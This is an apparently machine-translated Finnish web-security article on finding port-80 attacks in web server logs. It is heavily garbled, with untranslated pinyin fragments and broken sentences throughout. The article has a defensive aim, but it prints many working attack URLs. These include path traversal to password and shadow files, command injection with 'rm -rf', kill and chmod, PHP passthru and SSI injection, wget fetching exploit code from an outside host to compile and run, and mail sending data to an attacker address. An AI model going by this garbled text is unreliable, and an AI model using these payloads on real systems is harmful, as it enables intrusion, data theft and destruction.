I. Yhteenveto
II. Yksityiskohtainen kuvaus
III. Muut
IV. Heijastevaikutuksia analyysi
V. Jälkikäsittelytyöt
VI. Päätelmät
[Abstract]
Web-sivuston 80, koska oletuksena palvelun satama, johon erilaiset turvallisuuspoliittiset ongelmat pitää heittää pois, Zhexieloudong Zhongyi Xie jopa hyödynnetään saada Ji Tong Guan Liyuan n Quanxianjinru Zhandianneibu, seuraavat ovat joitakin 80 Duankou Zenomorph oikeus jälkeä hyökkäys Fang Shi tutkimus-ja kertoa, miten löytää ongelmia lokista tietueita.
[Detail]
Täällä osittain läpi useita Lie Zi, osoittaa web-palvelimen ja hakumenettely ovat yleensä se hyökkäys, ja vasemmalla jälkiä, Zhe Xie Lie Zi Jin Jin kyllä Dai Biao Liao Zhu Yao hyökkäys, eikä niitä ole lueteltu Suoyou muodossa hyökkäys, tätä osaa yksityiskohtainen kuvaus roolista kunkin hyökkäys, ja sen, miten voi hyödyntää näitä haavoittuvuuksia hyökätä.
(1). "" .. "Ja "..." pyyntö
Nämä hyökkäykset merkki on hyvin tavallista web-sovellusten ja web-palvelimia, joita on käytetty, jotta hyökkääjä tai mato-virus ohjelma 改变 Web-palvelimen polku, Huode vierailla Fei Gongin Kai alue. Useimmat CGI-ohjelmia näitä puutteita ".." pyyntö.
Esimerkki:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Tämä osoittaa hyökkääjä Liezi pyytää mosd tämä tiedosto, jos hyökkääjä pystyy läpimurto web-palvelimen juurihakemistoon sitten enemmän tietoa ja saada lisää oikeuksia.
(2) '% 20' pyynnön
% 20 hex arvo 16 tilat, vaikka tämä ei tarkoita sitä, voit käyttää mitään, mutta kun katsella löytävät, jotkut web-palvelin ahkeruus jatkuva model after tämä merkki voidaan panna tehokkaasti täytäntöön Siksi sinun tulisi huolellisesti tarkastella loki. Toisaalta, pyyntö voi joskus auttaa tekemään joitakin komentoja.
Esimerkki:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Tämä Liezi osoittaa hyökkääjän suorittaa unix-komento, jossa luetellaan koko luettelo pyydetyistä asiakirjoista, jolloin hyökkääjän pääsyn tärkeitä tiedostoja järjestelmän, joka auttaa häntä edelleen säätää saamisen edellytykset etuoikeuksia.
(3) '% 00' pyynnön
% 00 sanoi 16-bittinen heksadesimaali tyhjä, hän pystyi hupsu web-sovellus, ja pyytää erilaisia tiedostoja.
Esimerkkejä:
http://host/cgi-bin/lame.cgi?page=index.html
Tämä voi olla voimassa pyynnön koneeseen, jos hyökkääjä tietää tämän pyynnön onnistumisesta, hän lisää etsiä cgi menettelyjä.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Ehkä cgi ohjelma ei hyväksy tätä pyyntöä, koska se on pyynnöstä tarkistaa tiedoston nimen pääte, kuten: html.shtml tai muita tiedostoja. Useimmat ohjelmat kertoo sinulle pyydetyn tiedoston tyyppi on virheellinen, tällä kertaa se kertoo hyökkääjä pyytää Tiedosto on luonteeltaan ja tiedostotyypin pääte, joten yksi hyökkääjä voi saada system polun, tiedostonimen, mikä in järjestelmä lisää arkaluonteisia tietoja
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Huomiota tähän pyyntöön, se pettää cgi-ohjelma, että tämä asiakirja on määritellä hyväksyttävä tiedostotyypit, jotkin sovellukset tehokkaita tarkastuksia tyhmä hakemusasiakirjat, jota käytetään yleisesti menetelmiä hyökkääjä.
(4) "|" pyyntö
Tämä putki luonteen, Unix pyytää apua täytäntöönpanossa eri järjestelmän komentoja samaan aikaan.
Esimerkki:
# Cat access_log | grep-i ".."
(Tämä komento näyttää sisään ".." pyynnöstä, joita käytetään iskuissa ja matoja löytyi)
Usein huomaamaan, että monet web-sovellukset käyttävät tätä merkkiä, tämä johtaa myös vääriä hälytyksiä ja IDS lokit.
Vuonna huolellisesti tutkinut hakemuksen, joten etu vähentää väärien hälytysten ja tunkeutumisen havaitsemisen järjestelmät.
Tässä joitain Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Tämä pyyntö komento, seuraavat ovat joitakin muutoksia Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Tämä pyyntö on lueteltu Unixissa / etc-hakemiston kaikki tiedostot
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
Täytäntöönpano pyynnön kissa ja grep komento komento toteutetaan, tarkistaa "lame"
(5) ";" pyyntö
Unix-järjestelmien, tämä merkki sallii useiden komentoriviltä toteuttamista
Esimerkki:
# Id, uname-
(Täytäntöönpano id komennon jälkeen täytäntöönpano uname-komento)
Jotkut web-ohjelman kanssa tätä merkkiä, saattaa johtaa sinun IDS lokit varoitus vika, kannattaa tarkistaa huolellisesti Web-ohjelman, joten voit vähentää riskiä epäonnistumisesta IDS kuulutuksia.
(6) " " ja " " Pyyntö
Kannattaa tarkistaa lokit tallentaa kaksi merkkiä, monestakin syystä, joista ensimmäinen on merkki siitä, että lisätään asiakirjan tietoja
Esimerkki 1:
# Echo "Sinun hax0red H0 H0" / etc / motd (motd pyytää kirjallista tietoa tämän asiakirjan)
Hyökkääjä voi helposti käyttää pyynnön edellä jäljet Web-sivu. Kuten kuuluisa RDS hyödyntää hyökkääjä käytetään usein muuttaa sivun.
Esimerkki 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html huomaat, että kieli merkkien täällä, hän myös vietti " "," " merkkejä, kuten hyökkäyksiä ei voi aiheuttaa hyökkääjän pääsyn järjestelmään, se sekoittaa ihmiset pitävät tätä kelvollisen verkkosivuston tiedot (johtavat Ihmiset linkistä vierailla hyökkääjän asettaa osoite, pyyntö voidaan koodattu 16 hex merkkiä muodossa, niin että jälkiä hyökkäys ei ole niin ilmeinen)
(7) "!" Pyyntö
Yhteinen kieli on tämä merkki pyynnöstä SS (Server Side Include) I hyökätä, jos hyökkääjä on hyökkääjä sekoittaa käyttäjä napsauttaa linkkiä asettaa, ja sama kuin edellä.
Esimerkki:
http://host1/something.php =
Lieh-tzu hyökkäys voidaan tehdä se tehdä sivuston tiedosto host2 alkaen host1 yläpuolella (tietenkin vaatia kävijöitä käymään hyökkääjän yhteysasetukset. Pyyntö voidaan muuntaa 16 hex koodaus naamio, ei helposti löydy)
Samalla tämä lähestymistapa voi myös suorittaa komennon viranomaisen verkkosivuilla
Esimerkki:
http://host/something.php =
Lieh aikavälillä etäjärjestelmässä "id" komento, se näyttää verkkosivuilla käyttäjän id on yleensä "ei kukaan" tai "www"
Tämä lomake mahdollistaa myös mukana piilotetut tiedostot.
Esimerkki:
http://host/something.php =
Piilotiedostot. Htpasswd ei näytetä, Apache tulee kieltäytyä tällaisen sääntöjä. Ht lomake ja SSI logo ohittaa nämä rajoitukset, ja aiheuttaa turvallisuusongelmia
(8) "," Pyyntö
Tämä hyökkäys Yongyushitu menettelyjen etäinen höyty 应用 中 lisätä PHP-ohjelma, joka saattaa sallia täytäntöönpanomääräys, joka riippuu palvelimen asetuksista, ja muut työn monet tekijät (kuten php-asetukset Wei Anquanmoshi)
Esimerkki: http://host/something.php = passthru ("id ");?
Joissakin yksinkertainen php sovellus, se voi olla Web-sivusto etäkoneen käyttäjän oikeuksia suorittaa paikallinen komento
(9) "" "pyyntö
Tämä merkki käytetään myöhemmin suorittaa komentoja Perl, merkkiä web-sovellus ei usein käytetä, joten jos näet sen loki, tulisi olla hyvin varovaisia
Esimerkki:
http://host/something.cgi = "id"
Kirjoita perl cgi kyseisen ohjelman johtaisi täytäntöönpanon id komento
[Lisää]
Seuraavassa jaksossa keskustellaan toteuttamisesta enemmän hyökkäyksiä voisi herruus sekä pyydetyt asiakirjat, ja jos olet etäinen komentojen suorittamisen virhe, se olisi kuinka tarkistaa löytö. Tämä osa on vain antaa sinulle hyvä idea, ja kerro järjestelmä, mitä tapahtuu, hyökkääjät yrittävät hyökätä järjestelmään jälkiä, mutta ei luetella kaikkia hyökkääjän komentojen ja pyyntöjä.
"/ Bin / ls"
Tämä komento kehottaa koko polku, monien web-sovellusten on tämä porsaanreikä, jos olet kirjautunut monin paikoin tällaista pyyntöä, on mahdollista, että suuri etäsuorittamisen komento haavoittuvuuden, mutta ei välttämättä ongelma voi myös olla väärä hälytys. Jälleen kerran muistutti, web-sovellus kirjallinen (CGI, ASP, PHP ... jne) on perusta turvallisuuden
Esimerkki:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Tämä ikkunat kuoren, jos hyökkääjä käyttää ja suorittaa tämän komentosarjan palvelimen asetukset edellytyksin sallittua ikkunat kone voi do mitään, paljon matoja is through port 80, välittäminen remote kone
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Tämä on kahden binääritiedostojen, sen ongelmista ja / bin / ls, kuten, jos olet kirjautunut monin paikoin tällaista pyyntöä, on mahdollista, että suuri etäsuorittamisen komento haavoittuvuuden, mutta ei välttämättä ongelma voi myös olla vääriä positiivisia.
Se osoittaa, mikä osa kuuluu mihinkin käyttäjä ja ryhmä
Esimerkki:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Tämä komento voi poistaa tiedostoja ilman oikea käyttö on erittäin vaarallista
Esimerkkejä:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget ja TFTP" komento
Nämä komennot ovat usein hyökkääjä voi saada myös oikeudet ladata tiedostoja, wget on unix-komento nojalla, voidaan ladata takaovia, TFTP komennossa unix ja NT on käytetty jotta download arkistoida. Jotkut IIS madot leviävät itsensä TFTP kopioida viruksen muita isäntäkasveja
Esimerkkejä:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// isäntä / cgi-bin / bad.cgi? DOH = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat" komento
Tämä komennolla tarkastella tiedoston sisältöä, jota käytetään lukea tärkeitä tietoja, kuten asetustiedostoja, salasana tiedostoja, luotto-tiedostoja ja asiakirjoja voit ajatella
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = kissa% 20/etc/motd;
"Echo" komento
Tämän komennon avulla kirjoittaa tietoja tiedostoon, esim. "index.html"
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "FC-# kiivi% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "FC-# kiivi% 20was% 20here"% 20 % 200day.txt;
"Ps" komento
Listaa tällä hetkellä käynnissä prosessi, kerro hyökkääjä että etäisäntään käynnissä ohjelmisto, jotta saataisiin kuva turvallisuuskysymyksistä, saada lisää oikeuksia
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH = ps% 20-aux;
"Kill ja killall-komento
Unixissa Jotta tappaa tämä prosessi, hyökkääjä voi käyttää tätä komentoa lopettaa järjestelmän palveluja ja prosesseja voidaan myös poistaa jälkiä hyökkääjän, jotkut hyödyntää tuottaa paljon lapsen prosessien
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" komennolla
Tämä komento kertoo hyökkääjä etäkoneen nimi, jonkin aikaa, tällä www-sivustolla, jotta tietää mikä isp, hyökkääjä voi vieraili tänään. Uname-pyytää tavallisesti nämä kirjataan lokitiedostoon
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-| http://host/cgi-bin/bad. cgi? DOH = uname% 20-;
"Kopio, gcc, perl, python jne. ..." kokoelma / tulkinta komento
Hyökkääjä kautta wget tai TFTP ladata hyödyntää ja käyttää CC, gcc-kääntäjä kääntää tämä suoritettavaan ohjelmaan, ja lisäksi käyttöoikeudet
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Jos tarkastelet lokit löytyy "perl" python "Nämä ohjeet voivat olla etähyökkääjä ladata perl, python script, ja yritti saada erioikeuksia paikallisten
"Mail" komento
Hyökkääjät käyttävät usein tätä komentoa, jotkut tärkeitä asiakirjoja hyökkääjän oman postilaatikon, mutta myös halukas sähköposti pommi-iskut suoritetaan
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh jne. ..." ja muita komentoja
Unix järjestelmissä, jotta ne voivat muuttaa tiedoston käyttöoikeuksia
chown = avulla asetetaan tiedoston omistaja chmod = sallii asettaa tiedoston käyttöoikeuksia chgrp = mahdollistaa omistaja muuttaa ryhmän käyttöoikeudet tiedostoja chsh = lupa muuttaa käyttäjän kuori
Esimerkkejä: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" tiedosto
Tämä on järjestelmän salasana tiedosto, yleensä varjo Guo, ja saa nähdä salatun salasanan, mutta hyökkäys oli ottaen voimme tietää, että on voimassa oleva käyttäjätunnus, Yiji järjestelmä absoluuttinen polku nimet jne. Xinxi sivustoa Yu yleensä jonka varjo pois, joten hyökkääjä tavallisesti katso / etc / shadow tiedosto
"/ Etc / master.passwd"
Tämä tiedosto on BSD järjestelmän salasana tiedosto, joka sisältää salatun salasanan, tiedoston root on vain read-only, ja jotkut ammattitaidottomat hyökkääjät avasi yrittää lukea sisältö sisällä. If sivusto on pääkäyttäjän oikeuksia suorittaa, niin hyökkääjä on, voimme lukea sisällön sisällä, paljon ongelmia järjestelmän ylläpitäjälle tulee yksi toisensa jälkeen
"/ Etc / shadow"
Sisältää salasanan salattuna, lue samalta root ja / et / master.passwd lähes
"/ Etc / motd"
Kun käyttäjä kirjautuu Unixissa, tieto tulee, että "Message of the Day"-tiedoston, se tarjoaa tärkeitä tietoja, ja ylläpitäjä käyttäjien joidenkin asettaa ne käyttäjät, jotka haluavat nähdä ne, jotka eivät sisältää myös käyttöjärjestelmän versio tiedot, hyökkääjä yleensä nähdä tämän tiedoston, ymmärtää, mitä järjestelmä on käynnissä hyökkääjä, seuraava vaihe on etsiä tällaista järjestelmää, hyödyntää ja edelleen pääsyä järjestelmän käyttöoikeudet
"/ Etc / hosts"
Asiakirjassa IP-osoitteen ja verkon tiedot, hyökkääjä voi oppia lisää järjestelmän verkkoasetukset
"/ Usr / local / apache / conf / httpd.conf"
Tämä on Apache-web-palvelimen asetustiedostossa, hyökkääjä voi ymmärtää, kuten cgi, ssi ja muut tiedot ovat saatavilla
"/ Etc / inetd.conf"
Tämä asetustiedosto inetd palvelua, hyökkääjä voi saada selville etäkoneen että palvelu alkaa, onko käyttö kääre pääsy Kong Zhi Jin Xing, Fa Xian kääre suorittaa, jos hyökkääjä seuraava vaihe Jiancha "/ etc / hosts.allow" ja "/ etc / hosts.deny", tiedosto, jota voidaan muuttaa joitakin asetuksia, käyttöoikeudet
". Htpasswd. Htaccess, ja. Htgroup"
Nämä tiedostot ovat tyypillisesti käytetään web-sivuston käyttäjien autentikointiin, hyökkääjä katsella näitä tiedostoja ja saada käyttäjätunnuksen ja salasanan, salasana tiedosto. Htpasswd on salattu, murtaa joitakin yksinkertaisia salauksen purkaminen, mahdollistaa hyökkääjän pääsyn sivuston suojelualueita (yleensä käyttäjän samaa käyttäjänimeä ja salasanaa, hyökkääjä voi jopa vierailla tili)
"Access_log ja error_log"
Nämä ovat Apache palvelimen lokitiedostoja, hyökkääjät usein näitä tiedostoja, tarkastella näitä pyyntöjä kirjataan, ne ja muut pyynnöt eri paikoissa
Yleensä hyökkääjä muuttaa log-tiedostoja, kuten oman osoitetiedot, hyökkääjä sataman kautta 80 kautta tietokone ja varmuuskopio-järjestelmä ei myöskään toimi, ei ole muuta kirjaa ohjelma tallentaa järjestelmän tilan, joka tunkeutumisen havaitseminen on erittäin vaikeaa tehdä
"[Drive-kirjain]: winntrepairsam._ tai [drive-kirjain]: winntrepairsam"
Windows NT tunnussana arkistoida, jos kauko-komentoa ei voida panna täytäntöön, hyökkääjät ovat yleensä pyytää näitä asiakirjoja, sitten "l0pht halki" minkälaisia salasanojen murtamiseen työkaluja, crack, ylläpitäjä, jos hyökkääjä yrittää hyökätä salasana tiedosto, jos auta etäkoneen on hyökkääjä saa määräysvallan
[Ylivuoto analyysi]
Vuonna Tässä artikkelissa aion sanoa liikaa ylivuodon aihepiirin aion give out what those ilmiöitä ja jälkiä on huomionarvoista ja erityisen huolissaan, yksi puskuria usein hyökkää by hyökkääjä code muuntaminen ja vaikeasti to etsiä muita tapoja saavuttaa
Tässä on yksinkertainen Lie Zi
Esimerkki: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Tämä Liezi osoittaa hyökkääjä sovellus lähettää paljon luonnetta, testata ohjelma puskurin ylivuodon, puskurin ylivuoto voi saada kauko-komentojen suorittamisen isäntä käyttöoikeudet, jos omistaja on setuid ja menettelyt root kautta ylivuoto, saa käyttää koko järjestelmää, jos ei miellytä setuid ohjelma, niin ylivuoto vain suorittamalla Web-sivuston käyttöoikeudet
Täällä ei voi sanoa kaikista tekijöistä, mutta kannattaa tarkistaa säännöllisesti lokitiedosto, jos kyseinen päivä yhtäkkiä paljon pyyntöjä, mutta yleensä enintään pyynnön, se tarkoittaa sitä tehdään ylivuoto hyökkäyksiä, tietenkin, voi myös olla Uusi verkko mato hyökkäys
[Jälkikäsittelytyöt]
Kaikki hyökkäykset edellä mainittujen pyynnöstä hyökkääjä yleensä tietää IDS tarkistaa aina näihin pyyntöihin koneet, yleensä hyökkääjä käyttää tietojen muuntaminen työkalu muuntaa sisällön pyysi 16-yhtyeen muodossa, jolloin IDS ohittaa näitä pyyntöjä, Tunnemme CGI haavoittuvuuden skannaus työkalu on hyvä Liezi Whisker. Jos tarkastelet lokia time löytyi suuri määrä 16-bändi ja ei jokin yhteinen merkkejä, niin hyökkääjä voi yrittää käyttää joitakin tapoja hyökätä sinun järjestelmä
Nopea tapa on lokitiedosto pyynnöstä näiden 16 hex, kopioi se selaimen, selaimen voidaan muuntaa oikeus pyytää, ja näyttää sisällön pyynnöstä, jos et rohkeutta ottaa tämä riski, yksinkertainen mies ASCII voi antaa sinulle oikean koodin.
[Johtopäätös]
Tämä artikkeli ei kata kaikkia 80 porttia ja hyökkäyksen, mutta useimmat ovat olleet mainittu enemmän kuin yleinen hyökkäys, ja kertoa, miten tarkistaa lokitiedostot, ja kuinka lisätä esimerkiksi määrä IDS sääntöjä, kirjoittaa hänen tavoitteena on Web-järjestelmänvalvoja on huolissaan siitä, mitä hyvä idea, ja toivon, että tämä artikkeli voi auttaa web-ohjelman web-kehittäjien luoda parempia ohjelmia
OF HUOM: Jos sinulla on kommentteja ja ehdotuksia, lähetä sähköpostia admin@cgisecurity.com.